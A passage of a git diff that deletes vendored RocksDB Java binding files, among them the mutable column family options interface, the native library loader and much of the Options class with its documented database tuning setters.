-        final long maxSequentialSkipInIterations) {
-      return setLong(MiscOption.max_sequential_skip_in_iterations,
-          maxSequentialSkipInIterations);
-    }
-
-    @Override
-    public long maxSequentialSkipInIterations() {
-      return getLong(MiscOption.max_sequential_skip_in_iterations);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setParanoidFileChecks(
-        final boolean paranoidFileChecks) {
-      return setBoolean(MiscOption.paranoid_file_checks, paranoidFileChecks);
-    }
-
-    @Override
-    public boolean paranoidFileChecks() {
-      return getBoolean(MiscOption.paranoid_file_checks);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setCompressionType(
-        final CompressionType compressionType) {
-      return setEnum(MiscOption.compression_type, compressionType);
-    }
-
-    @Override
-    public CompressionType compressionType() {
-      return (CompressionType)getEnum(MiscOption.compression_type);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setReportBgIoStats(
-        final boolean reportBgIoStats) {
-      return setBoolean(MiscOption.report_bg_io_stats, reportBgIoStats);
-    }
-
-    @Override
-    public boolean reportBgIoStats() {
-      return getBoolean(MiscOption.report_bg_io_stats);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java
deleted file mode 100644
index c2efcc5..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java
+++ /dev/null
@@ -1,159 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public interface MutableColumnFamilyOptionsInterface
-    <T extends MutableColumnFamilyOptionsInterface>
-        extends AdvancedMutableColumnFamilyOptionsInterface<T> {
-
-  /**
-   * Amount of data to build up in memory (backed by an unsorted log
-   * on disk) before converting to a sorted on-disk file.
-   *
-   * Larger values increase performance, especially during bulk loads.
-   * Up to {@code max_write_buffer_number} write buffers may be held in memory
-   * at the same time, so you may wish to adjust this parameter
-   * to control memory usage.
-   *
-   * Also, a larger write buffer will result in a longer recovery time
-   * the next time the database is opened.
-   *
-   * Default: 4MB
-   * @param writeBufferSize the size of write buffer.
-   * @return the instance of the current object.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  MutableColumnFamilyOptionsInterface setWriteBufferSize(long writeBufferSize);
-
-  /**
-   * Return size of write buffer size.
-   *
-   * @return size of write buffer.
-   * @see #setWriteBufferSize(long)
-   */
-  long writeBufferSize();
-
-  /**
-   * Disable automatic compactions. Manual compactions can still
-   * be issued on this column family
-   *
-   * @param disableAutoCompactions true if auto-compactions are disabled.
-   * @return the reference to the current option.
-   */
-  MutableColumnFamilyOptionsInterface setDisableAutoCompactions(
-      boolean disableAutoCompactions);
-
-  /**
-   * Disable automatic compactions. Manual compactions can still
-   * be issued on this column family
-   *
-   * @return true if auto-compactions are disabled.
-   */
-  boolean disableAutoCompactions();
-
-  /**
-   * Number of files to trigger level-0 compaction. A value &lt; 0 means that
-   * level-0 compaction will not be triggered by number of files at all.
-   *
-   * Default: 4
-   *
-   * @param level0FileNumCompactionTrigger The number of files to trigger
-   *   level-0 compaction
-   * @return the reference to the current option.
-   */
-  MutableColumnFamilyOptionsInterface setLevel0FileNumCompactionTrigger(
-      int level0FileNumCompactionTrigger);
-
-  /**
-   * Number of files to trigger level-0 compaction. A value &lt; 0 means that
-   * level-0 compaction will not be triggered by number of files at all.
-   *
-   * Default: 4
-   *
-   * @return The number of files to trigger
-   */
-  int level0FileNumCompactionTrigger();
-
-  /**
-   * We try to limit number of bytes in one compaction to be lower than this
-   * threshold. But it's not guaranteed.
-   * Value 0 will be sanitized.
-   *
-   * @param maxCompactionBytes max bytes in a compaction
-   * @return the reference to the current option.
-   * @see #maxCompactionBytes()
-   */
-  MutableColumnFamilyOptionsInterface setMaxCompactionBytes(final long maxCompactionBytes);
-
-  /**
-   * We try to limit number of bytes in one compaction to be lower than this
-   * threshold. But it's not guaranteed.
-   * Value 0 will be sanitized.
-   *
-   * @return the maximum number of bytes in for a compaction.
-   * @see #setMaxCompactionBytes(long)
-   */
-  long maxCompactionBytes();
-
-  /**
-   * The upper-bound of the total size of level-1 files in bytes.
-   * Maximum number of bytes for level L can be calculated as
-   * (maxBytesForLevelBase) * (maxBytesForLevelMultiplier ^ (L-1))
-   * For example, if maxBytesForLevelBase is 20MB, and if
-   * max_bytes_for_level_multiplier is 10, total data size for level-1
-   * will be 20MB, total file size for level-2 will be 200MB,
-   * and total file size for level-3 will be 2GB.
-   * by default 'maxBytesForLevelBase' is 10MB.
-   *
-   * @param maxBytesForLevelBase maximum bytes for level base.
-   *
-   * @return the reference to the current option.
-   *
-   * See {@link AdvancedMutableColumnFamilyOptionsInterface#setMaxBytesForLevelMultiplier(double)}
-   */
-  T setMaxBytesForLevelBase(
-      long maxBytesForLevelBase);
-
-  /**
-   * The upper-bound of the total size of level-1 files in bytes.
-   * Maximum number of bytes for level L can be calculated as
-   * (maxBytesForLevelBase) * (maxBytesForLevelMultiplier ^ (L-1))
-   * For example, if maxBytesForLevelBase is 20MB, and if
-   * max_bytes_for_level_multiplier is 10, total data size for level-1
-   * will be 20MB, total file size for level-2 will be 200MB,
-   * and total file size for level-3 will be 2GB.
-   * by default 'maxBytesForLevelBase' is 10MB.
-   *
-   * @return the upper-bound of the total size of level-1 files
-   *     in bytes.
-   *
-   * See {@link AdvancedMutableColumnFamilyOptionsInterface#maxBytesForLevelMultiplier()}
-   */
-  long maxBytesForLevelBase();
-
-  /**
-   * Compress blocks using the specified compression algorithm.  This
-   * parameter can be changed dynamically.
-   *
-   * Default: SNAPPY_COMPRESSION, which gives lightweight but fast compression.
-   *
-   * @param compressionType Compression Type.
-   * @return the reference to the current option.
-   */
-  T setCompressionType(
-          CompressionType compressionType);
-
-  /**
-   * Compress blocks using the specified compression algorithm.  This
-   * parameter can be changed dynamically.
-   *
-   * Default: SNAPPY_COMPRESSION, which gives lightweight but fast compression.
-   *
-   * @return Compression type.
-   */
-  CompressionType compressionType();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/NativeLibraryLoader.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/NativeLibraryLoader.java
deleted file mode 100644
index 96d364c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/NativeLibraryLoader.java
+++ /dev/null
@@ -1,124 +0,0 @@
-package org.rocksdb;
-
-import java.io.*;
-import java.nio.file.Files;
-import java.nio.file.StandardCopyOption;
-
-import org.rocksdb.util.Environment;
-
-/**
- * This class is used to load the RocksDB shared library from within the jar.
- * The shared library is extracted to a temp folder and loaded from there.
- */
-public class NativeLibraryLoader {
-  //singleton
-  private static final NativeLibraryLoader instance = new NativeLibraryLoader();
-  private static boolean initialized = false;
-
-  private static final String sharedLibraryName = Environment.getSharedLibraryName("rocksdb");
-  private static final String jniLibraryName = Environment.getJniLibraryName("rocksdb");
-  private static final String jniLibraryFileName = Environment.getJniLibraryFileName("rocksdb");
-  private static final String tempFilePrefix = "librocksdbjni";
-  private static final String tempFileSuffix = Environment.getJniLibraryExtension();
-
-  /**
-   * Get a reference to the NativeLibraryLoader
-   *
-   * @return The NativeLibraryLoader
-   */
-  public static NativeLibraryLoader getInstance() {
-    return instance;
-  }
-
-  /**
-   * Firstly attempts to load the library from <i>java.library.path</i>,
-   * if that fails then it falls back to extracting
-   * the library from the classpath
-   * {@link org.rocksdb.NativeLibraryLoader#loadLibraryFromJar(java.lang.String)}
-   *
-   * @param tmpDir A temporary directory to use
-   *   to copy the native library to when loading from the classpath.
-   *   If null, or the empty string, we rely on Java's
-   *   {@link java.io.File#createTempFile(String, String)}
-   *   function to provide a temporary location.
-   *   The temporary file will be registered for deletion
-   *   on exit.
-   *
-   * @throws java.io.IOException if a filesystem operation fails.
-   */
-  public synchronized void loadLibrary(final String tmpDir) throws IOException {
-    try {
-        System.loadLibrary(sharedLibraryName);
-    } catch(final UnsatisfiedLinkError ule1) {
-      try {
-        System.loadLibrary(jniLibraryName);
-      } catch(final UnsatisfiedLinkError ule2) {
-        loadLibraryFromJar(tmpDir);
-      }
-    }
-  }
-
-  /**
-   * Attempts to extract the native RocksDB library
-   * from the classpath and load it
-   *
-   * @param tmpDir A temporary directory to use
-   *   to copy the native library to. If null,
-   *   or the empty string, we rely on Java's
-   *   {@link java.io.File#createTempFile(String, String)}
-   *   function to provide a temporary location.
-   *   The temporary file will be registered for deletion
-   *   on exit.
-   *
-   * @throws java.io.IOException if a filesystem operation fails.
-   */
-  void loadLibraryFromJar(final String tmpDir)
-      throws IOException {
-    if (!initialized) {
-      System.load(loadLibraryFromJarToTemp(tmpDir).getAbsolutePath());
-      initialized = true;
-    }
-  }
-
-  File loadLibraryFromJarToTemp(final String tmpDir)
-          throws IOException {
-    final File temp;
-    if (tmpDir == null || tmpDir.isEmpty()) {
-      temp = File.createTempFile(tempFilePrefix, tempFileSuffix);
-    } else {
-      temp = new File(tmpDir, jniLibraryFileName);
-      if (temp.exists() && !temp.delete()) {
-        throw new RuntimeException("File: " + temp.getAbsolutePath()
-            + " already exists and cannot be removed.");
-      }
-      if (!temp.createNewFile()) {
-        throw new RuntimeException("File: " + temp.getAbsolutePath()
-            + " could not be created.");
-      }
-    }
-
-    if (!temp.exists()) {
-      throw new RuntimeException("File " + temp.getAbsolutePath() + " does not exist.");
-    } else {
-      temp.deleteOnExit();
-    }
-
-    // attempt to copy the library from the Jar file to the temp destination
-    try (final InputStream is = getClass().getClassLoader().
-      getResourceAsStream(jniLibraryFileName)) {
-      if (is == null) {
-        throw new RuntimeException(jniLibraryFileName + " was not found inside JAR.");
-      } else {
-        Files.copy(is, temp.toPath(), StandardCopyOption.REPLACE_EXISTING);
-      }
-    }
-
-    return temp;
-  }
-
-  /**
-   * Private constructor to disallow instantiation
-   */
-  private NativeLibraryLoader() {
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Options.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Options.java
deleted file mode 100644
index dcd1138..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Options.java
+++ /dev/null
@@ -1,1864 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.nio.file.Paths;
-import java.util.ArrayList;
-import java.util.Collection;
-import java.util.Collections;
-import java.util.List;
-
-/**
- * Options to control the behavior of a database.  It will be used
- * during the creation of a {@link org.rocksdb.RocksDB} (i.e., RocksDB.open()).
- *
- * If {@link #dispose()} function is not called, then it will be GC'd
- * automaticallyand native resources will be released as part of the process.
- */
-public class Options extends RocksObject
-    implements DBOptionsInterface<Options>, ColumnFamilyOptionsInterface<Options>,
-    MutableColumnFamilyOptionsInterface<Options> {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  /**
-   * Construct options for opening a RocksDB.
-   *
-   * This constructor will create (by allocating a block of memory)
-   * an {@code rocksdb::Options} in the c++ side.
-   */
-  public Options() {
-    super(newOptions());
-    env_ = Env.getDefault();
-  }
-
-  /**
-   * Construct options for opening a RocksDB. Reusing database options
-   * and column family options.
-   *
-   * @param dbOptions {@link org.rocksdb.DBOptions} instance
-   * @param columnFamilyOptions {@link org.rocksdb.ColumnFamilyOptions}
-   *     instance
-   */
-  public Options(final DBOptions dbOptions,
-      final ColumnFamilyOptions columnFamilyOptions) {
-    super(newOptions(dbOptions.nativeHandle_,
-        columnFamilyOptions.nativeHandle_));
-    env_ = Env.getDefault();
-  }
-
-  @Override
-  public Options setIncreaseParallelism(final int totalThreads) {
-    assert(isOwningHandle());
-    setIncreaseParallelism(nativeHandle_, totalThreads);
-    return this;
-  }
-
-  @Override
-  public Options setCreateIfMissing(final boolean flag) {
-    assert(isOwningHandle());
-    setCreateIfMissing(nativeHandle_, flag);
-    return this;
-  }
-
-  @Override
-  public Options setCreateMissingColumnFamilies(final boolean flag) {
-    assert(isOwningHandle());
-    setCreateMissingColumnFamilies(nativeHandle_, flag);
-    return this;
-  }
-
-  @Override
-  public Options setEnv(final Env env) {
-    assert(isOwningHandle());
-    setEnv(nativeHandle_, env.nativeHandle_);
-    env_ = env;
-    return this;
-  }
-
-  @Override
-  public Env getEnv() {
-    return env_;
-  }
-
-  /**
-   * <p>Set appropriate parameters for bulk loading.
-   * The reason that this is a function that returns "this" instead of a
-   * constructor is to enable chaining of multiple similar calls in the future.
-   * </p>
-   *
-   * <p>All data will be in level 0 without any automatic compaction.
-   * It's recommended to manually call CompactRange(NULL, NULL) before reading
-   * from the database, because otherwise the read can be very slow.</p>
-   *
-   * @return the instance of the current Options.
-   */
-  public Options prepareForBulkLoad() {
-    prepareForBulkLoad(nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public boolean createIfMissing() {
-    assert(isOwningHandle());
-    return createIfMissing(nativeHandle_);
-  }
-
-  @Override
-  public boolean createMissingColumnFamilies() {
-    assert(isOwningHandle());
-    return createMissingColumnFamilies(nativeHandle_);
-  }
-
-  @Override
-  public Options optimizeForSmallDb() {
-    optimizeForSmallDb(nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public Options optimizeForPointLookup(
-      long blockCacheSizeMb) {
-    optimizeForPointLookup(nativeHandle_,
-        blockCacheSizeMb);
-    return this;
-  }
-
-  @Override
-  public Options optimizeLevelStyleCompaction() {
-    optimizeLevelStyleCompaction(nativeHandle_,
-        DEFAULT_COMPACTION_MEMTABLE_MEMORY_BUDGET);
-    return this;
-  }
-
-  @Override
-  public Options optimizeLevelStyleCompaction(
-      long memtableMemoryBudget) {
-    optimizeLevelStyleCompaction(nativeHandle_,
-        memtableMemoryBudget);
-    return this;
-  }
-
-  @Override
-  public Options optimizeUniversalStyleCompaction() {
-    optimizeUniversalStyleCompaction(nativeHandle_,
-        DEFAULT_COMPACTION_MEMTABLE_MEMORY_BUDGET);
-    return this;
-  }
-
-  @Override
-  public Options optimizeUniversalStyleCompaction(
-      final long memtableMemoryBudget) {
-    optimizeUniversalStyleCompaction(nativeHandle_,
-        memtableMemoryBudget);
-    return this;
-  }
-
-  @Override
-  public Options setComparator(final BuiltinComparator builtinComparator) {
-    assert(isOwningHandle());
-    setComparatorHandle(nativeHandle_, builtinComparator.ordinal());
-    return this;
-  }
-
-  @Override
-  public Options setComparator(
-      final AbstractComparator<? extends AbstractSlice<?>> comparator) {
-    assert(isOwningHandle());
-    setComparatorHandle(nativeHandle_, comparator.getNativeHandle());
-    comparator_ = comparator;
-    return this;
-  }
-
-  @Override
-  public Options setMergeOperatorName(final String name) {
-    assert(isOwningHandle());
-    if (name == null) {
-      throw new IllegalArgumentException(
-          "Merge operator name must not be null.");
-    }
-    setMergeOperatorName(nativeHandle_, name);
-    return this;
-  }
-
-  @Override
-  public Options setMergeOperator(final MergeOperator mergeOperator) {
-    setMergeOperator(nativeHandle_, mergeOperator.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public Options setWriteBufferSize(final long writeBufferSize) {
-    assert(isOwningHandle());
-    setWriteBufferSize(nativeHandle_, writeBufferSize);
-    return this;
-  }
-
-  @Override
-  public long writeBufferSize()  {
-    assert(isOwningHandle());
-    return writeBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxWriteBufferNumber(final int maxWriteBufferNumber) {
-    assert(isOwningHandle());
-    setMaxWriteBufferNumber(nativeHandle_, maxWriteBufferNumber);
-    return this;
-  }
-
-  @Override
-  public int maxWriteBufferNumber() {
-    assert(isOwningHandle());
-    return maxWriteBufferNumber(nativeHandle_);
-  }
-
-  @Override
-  public boolean errorIfExists() {
-    assert(isOwningHandle());
-    return errorIfExists(nativeHandle_);
-  }
-
-  @Override
-  public Options setErrorIfExists(final boolean errorIfExists) {
-    assert(isOwningHandle());
-    setErrorIfExists(nativeHandle_, errorIfExists);
-    return this;
-  }
-
-  @Override
-  public boolean paranoidChecks() {
-    assert(isOwningHandle());
-    return paranoidChecks(nativeHandle_);
-  }
-
-  @Override
-  public Options setParanoidChecks(final boolean paranoidChecks) {
-    assert(isOwningHandle());
-    setParanoidChecks(nativeHandle_, paranoidChecks);
-    return this;
-  }
-
-  @Override
-  public int maxOpenFiles() {
-    assert(isOwningHandle());
-    return maxOpenFiles(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxFileOpeningThreads(final int maxFileOpeningThreads) {
-    assert(isOwningHandle());
-    setMaxFileOpeningThreads(nativeHandle_, maxFileOpeningThreads);
-    return this;
-  }
-
-  @Override
-  public int maxFileOpeningThreads() {
-    assert(isOwningHandle());
-    return maxFileOpeningThreads(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxTotalWalSize(final long maxTotalWalSize) {
-    assert(isOwningHandle());
-    setMaxTotalWalSize(nativeHandle_, maxTotalWalSize);
-    return this;
-  }
-
-  @Override
-  public long maxTotalWalSize() {
-    assert(isOwningHandle());
-    return maxTotalWalSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxOpenFiles(final int maxOpenFiles) {
-    assert(isOwningHandle());
-    setMaxOpenFiles(nativeHandle_, maxOpenFiles);
-    return this;
-  }
-
-  @Override
-  public boolean useFsync() {
-    assert(isOwningHandle());
-    return useFsync(nativeHandle_);
-  }
-
-  @Override
-  public Options setUseFsync(final boolean useFsync) {
-    assert(isOwningHandle());
-    setUseFsync(nativeHandle_, useFsync);
-    return this;
-  }
-
-  @Override
-  public Options setDbPaths(final Collection<DbPath> dbPaths) {
-    assert(isOwningHandle());
-
-    final int len = dbPaths.size();
-    final String paths[] = new String[len];
-    final long targetSizes[] = new long[len];
-
-    int i = 0;
-    for(final DbPath dbPath : dbPaths) {
-      paths[i] = dbPath.path.toString();
-      targetSizes[i] = dbPath.targetSize;
-      i++;
-    }
-    setDbPaths(nativeHandle_, paths, targetSizes);
-    return this;
-  }
-
-  @Override
-  public List<DbPath> dbPaths() {
-    final int len = (int)dbPathsLen(nativeHandle_);
-    if(len == 0) {
-      return Collections.emptyList();
-    } else {
-      final String paths[] = new String[len];
-      final long targetSizes[] = new long[len];
-
-      dbPaths(nativeHandle_, paths, targetSizes);
-
-      final List<DbPath> dbPaths = new ArrayList<>();
-      for(int i = 0; i < len; i++) {
-        dbPaths.add(new DbPath(Paths.get(paths[i]), targetSizes[i]));
-      }
-      return dbPaths;
-    }
-  }
-
-  @Override
-  public String dbLogDir() {
-    assert(isOwningHandle());
-    return dbLogDir(nativeHandle_);
-  }
-
-  @Override
-  public Options setDbLogDir(final String dbLogDir) {
-    assert(isOwningHandle());
-    setDbLogDir(nativeHandle_, dbLogDir);
-    return this;
-  }
-
-  @Override
-  public String walDir() {
-    assert(isOwningHandle());
-    return walDir(nativeHandle_);
-  }
-
-  @Override
-  public Options setWalDir(final String walDir) {
-    assert(isOwningHandle());
-    setWalDir(nativeHandle_, walDir);
-    return this;
-  }
-
-  @Override
-  public long deleteObsoleteFilesPeriodMicros() {
-    assert(isOwningHandle());
-    return deleteObsoleteFilesPeriodMicros(nativeHandle_);
-  }
-
-  @Override
-  public Options setDeleteObsoleteFilesPeriodMicros(
-      final long micros) {
-    assert(isOwningHandle());
-    setDeleteObsoleteFilesPeriodMicros(nativeHandle_, micros);
-    return this;
-  }
-
-  @Override
-  public int maxBackgroundCompactions() {
-    assert(isOwningHandle());
-    return maxBackgroundCompactions(nativeHandle_);
-  }
-
-  @Override
-  public Options setStatistics(final Statistics statistics) {
-    assert(isOwningHandle());
-    setStatistics(nativeHandle_, statistics.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public Statistics statistics() {
-    assert(isOwningHandle());
-    final long statisticsNativeHandle = statistics(nativeHandle_);
-    if(statisticsNativeHandle == 0) {
-      return null;
-    } else {
-      return new Statistics(statisticsNativeHandle);
-    }
-  }
-
-  @Override
-  public void setBaseBackgroundCompactions(
-      final int baseBackgroundCompactions) {
-    assert(isOwningHandle());
-    setBaseBackgroundCompactions(nativeHandle_, baseBackgroundCompactions);
-  }
-
-  @Override
-  public int baseBackgroundCompactions() {
-    assert(isOwningHandle());
-    return baseBackgroundCompactions(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxBackgroundCompactions(
-      final int maxBackgroundCompactions) {
-    assert(isOwningHandle());
-    setMaxBackgroundCompactions(nativeHandle_, maxBackgroundCompactions);
-    return this;
-  }
-
-  @Override
-  public void setMaxSubcompactions(final int maxSubcompactions) {
-    assert(isOwningHandle());
-    setMaxSubcompactions(nativeHandle_, maxSubcompactions);
-  }
-
-  @Override
-  public int maxSubcompactions() {
-    assert(isOwningHandle());
-    return maxSubcompactions(nativeHandle_);
-  }
-
-  @Override
-  public int maxBackgroundFlushes() {
-    assert(isOwningHandle());
-    return maxBackgroundFlushes(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxBackgroundFlushes(
-      final int maxBackgroundFlushes) {
-    assert(isOwningHandle());
-    setMaxBackgroundFlushes(nativeHandle_, maxBackgroundFlushes);
-    return this;
-  }
-
-  @Override
-  public long maxLogFileSize() {
-    assert(isOwningHandle());
-    return maxLogFileSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxLogFileSize(final long maxLogFileSize) {
-    assert(isOwningHandle());
-    setMaxLogFileSize(nativeHandle_, maxLogFileSize);
-    return this;
-  }
-
-  @Override
-  public long logFileTimeToRoll() {
-    assert(isOwningHandle());
-    return logFileTimeToRoll(nativeHandle_);
-  }
-
-  @Override
-  public Options setLogFileTimeToRoll(final long logFileTimeToRoll) {
-    assert(isOwningHandle());
-    setLogFileTimeToRoll(nativeHandle_, logFileTimeToRoll);
-    return this;
-  }
-
-  @Override
-  public long keepLogFileNum() {
-    assert(isOwningHandle());
-    return keepLogFileNum(nativeHandle_);
-  }
-
-  @Override
-  public Options setKeepLogFileNum(final long keepLogFileNum) {
-    assert(isOwningHandle());
-    setKeepLogFileNum(nativeHandle_, keepLogFileNum);
-    return this;
-  }
-
-
-  @Override
-  public Options setRecycleLogFileNum(final long recycleLogFileNum) {
-    assert(isOwningHandle());
-    setRecycleLogFileNum(nativeHandle_, recycleLogFileNum);
-    return this;
-  }
-
-  @Override
-  public long recycleLogFileNum() {
-    assert(isOwningHandle());
-    return recycleLogFileNum(nativeHandle_);
-  }
-
-  @Override
-  public long maxManifestFileSize() {
-    assert(isOwningHandle());
-    return maxManifestFileSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxManifestFileSize(
-      final long maxManifestFileSize) {
-    assert(isOwningHandle());
-    setMaxManifestFileSize(nativeHandle_, maxManifestFileSize);
-    return this;
-  }
-
-  @Override
-  public Options setMaxTableFilesSizeFIFO(
-    final long maxTableFilesSize) {
-    assert(maxTableFilesSize > 0); // unsigned native type
-    assert(isOwningHandle());
-    setMaxTableFilesSizeFIFO(nativeHandle_, maxTableFilesSize);
-    return this;
-  }
-
-  @Override
-  public long maxTableFilesSizeFIFO() {
-    return maxTableFilesSizeFIFO(nativeHandle_);
-  }
-
-  @Override
-  public int tableCacheNumshardbits() {
-    assert(isOwningHandle());
-    return tableCacheNumshardbits(nativeHandle_);
-  }
-
-  @Override
-  public Options setTableCacheNumshardbits(
-      final int tableCacheNumshardbits) {
-    assert(isOwningHandle());
-    setTableCacheNumshardbits(nativeHandle_, tableCacheNumshardbits);
-    return this;
-  }
-
-  @Override
-  public long walTtlSeconds() {
-    assert(isOwningHandle());
-    return walTtlSeconds(nativeHandle_);
-  }
-
-  @Override
-  public Options setWalTtlSeconds(final long walTtlSeconds) {
-    assert(isOwningHandle());
-    setWalTtlSeconds(nativeHandle_, walTtlSeconds);
-    return this;
-  }
-
-  @Override
-  public long walSizeLimitMB() {
-    assert(isOwningHandle());
-    return walSizeLimitMB(nativeHandle_);
-  }
-
-  @Override
-  public Options setWalSizeLimitMB(final long sizeLimitMB) {
-    assert(isOwningHandle());
-    setWalSizeLimitMB(nativeHandle_, sizeLimitMB);
-    return this;
-  }
-
-  @Override
-  public long manifestPreallocationSize() {
-    assert(isOwningHandle());
-    return manifestPreallocationSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setManifestPreallocationSize(final long size) {
-    assert(isOwningHandle());
-    setManifestPreallocationSize(nativeHandle_, size);
-    return this;
-  }
-
-  @Override
-  public Options setUseDirectReads(final boolean useDirectReads) {
-    assert(isOwningHandle());
-    setUseDirectReads(nativeHandle_, useDirectReads);
-    return this;
-  }
-
-  @Override
-  public boolean useDirectReads() {
-    assert(isOwningHandle());
-    return useDirectReads(nativeHandle_);
-  }
-
-  @Override
-  public Options setUseDirectIoForFlushAndCompaction(
-      final boolean useDirectIoForFlushAndCompaction) {
-    assert(isOwningHandle());
-    setUseDirectIoForFlushAndCompaction(nativeHandle_, useDirectIoForFlushAndCompaction);
-    return this;
-  }
-
-  @Override
-  public boolean useDirectIoForFlushAndCompaction() {
-    assert(isOwningHandle());
-    return useDirectIoForFlushAndCompaction(nativeHandle_);
-  }
-
-  @Override
-  public Options setAllowFAllocate(final boolean allowFAllocate) {
-    assert(isOwningHandle());
-    setAllowFAllocate(nativeHandle_, allowFAllocate);
-    return this;
-  }
-
-  @Override
-  public boolean allowFAllocate() {
-    assert(isOwningHandle());
-    return allowFAllocate(nativeHandle_);
-  }
-
-  @Override
-  public boolean allowMmapReads() {
-    assert(isOwningHandle());
-    return allowMmapReads(nativeHandle_);
-  }
-
-  @Override
-  public Options setAllowMmapReads(final boolean allowMmapReads) {
-    assert(isOwningHandle());
-    setAllowMmapReads(nativeHandle_, allowMmapReads);
-    return this;
-  }
-
-  @Override
-  public boolean allowMmapWrites() {
-    assert(isOwningHandle());
-    return allowMmapWrites(nativeHandle_);
-  }
-
-  @Override
-  public Options setAllowMmapWrites(final boolean allowMmapWrites) {
-    assert(isOwningHandle());
-    setAllowMmapWrites(nativeHandle_, allowMmapWrites);
-    return this;
-  }
-
-  @Override
-  public boolean isFdCloseOnExec() {
-    assert(isOwningHandle());
-    return isFdCloseOnExec(nativeHandle_);
-  }
-
-  @Override
-  public Options setIsFdCloseOnExec(final boolean isFdCloseOnExec) {
-    assert(isOwningHandle());
-    setIsFdCloseOnExec(nativeHandle_, isFdCloseOnExec);
-    return this;
-  }
-
-  @Override
-  public int statsDumpPeriodSec() {
-    assert(isOwningHandle());
-    return statsDumpPeriodSec(nativeHandle_);
-  }
-
-  @Override
-  public Options setStatsDumpPeriodSec(final int statsDumpPeriodSec) {
-    assert(isOwningHandle());
-    setStatsDumpPeriodSec(nativeHandle_, statsDumpPeriodSec);
-    return this;
-  }
-
-  @Override
-  public boolean adviseRandomOnOpen() {
-    return adviseRandomOnOpen(nativeHandle_);
-  }
-
-  @Override
-  public Options setAdviseRandomOnOpen(final boolean adviseRandomOnOpen) {
-    assert(isOwningHandle());
-    setAdviseRandomOnOpen(nativeHandle_, adviseRandomOnOpen);
-    return this;
-  }
-
-  @Override
-  public Options setDbWriteBufferSize(final long dbWriteBufferSize) {
-    assert(isOwningHandle());
-    setDbWriteBufferSize(nativeHandle_, dbWriteBufferSize);
-    return this;
-  }
-
-  @Override
-  public long dbWriteBufferSize() {
-    assert(isOwningHandle());
-    return dbWriteBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setAccessHintOnCompactionStart(final AccessHint accessHint) {
-    assert(isOwningHandle());
-    setAccessHintOnCompactionStart(nativeHandle_, accessHint.getValue());
-    return this;
-  }
-
-  @Override
-  public AccessHint accessHintOnCompactionStart() {
-    assert(isOwningHandle());
-    return AccessHint.getAccessHint(accessHintOnCompactionStart(nativeHandle_));
-  }
-
-  @Override
-  public Options setNewTableReaderForCompactionInputs(
-      final boolean newTableReaderForCompactionInputs) {
-    assert(isOwningHandle());
-    setNewTableReaderForCompactionInputs(nativeHandle_,
-        newTableReaderForCompactionInputs);
-    return this;
-  }
-
-  @Override
-  public boolean newTableReaderForCompactionInputs() {
-    assert(isOwningHandle());
-    return newTableReaderForCompactionInputs(nativeHandle_);
-  }
-
-  @Override
-  public Options setCompactionReadaheadSize(final long compactionReadaheadSize) {
-    assert(isOwningHandle());
-    setCompactionReadaheadSize(nativeHandle_, compactionReadaheadSize);
-    return this;
-  }
-
-  @Override
-  public long compactionReadaheadSize() {
-    assert(isOwningHandle());
-    return compactionReadaheadSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setRandomAccessMaxBufferSize(final long randomAccessMaxBufferSize) {
-    assert(isOwningHandle());
-    setRandomAccessMaxBufferSize(nativeHandle_, randomAccessMaxBufferSize);
-    return this;
-  }
-
-  @Override
-  public long randomAccessMaxBufferSize() {
-    assert(isOwningHandle());
-    return randomAccessMaxBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setWritableFileMaxBufferSize(final long writableFileMaxBufferSize) {
-    assert(isOwningHandle());
-    setWritableFileMaxBufferSize(nativeHandle_, writableFileMaxBufferSize);
-    return this;
-  }
-
-  @Override
-  public long writableFileMaxBufferSize() {
-    assert(isOwningHandle());
-    return writableFileMaxBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public boolean useAdaptiveMutex() {
-    assert(isOwningHandle());
-    return useAdaptiveMutex(nativeHandle_);
-  }
-
-  @Override
-  public Options setUseAdaptiveMutex(final boolean useAdaptiveMutex) {
-    assert(isOwningHandle());
-    setUseAdaptiveMutex(nativeHandle_, useAdaptiveMutex);
-    return this;
-  }
-
-  @Override
-  public long bytesPerSync() {
-    return bytesPerSync(nativeHandle_);
-  }
-
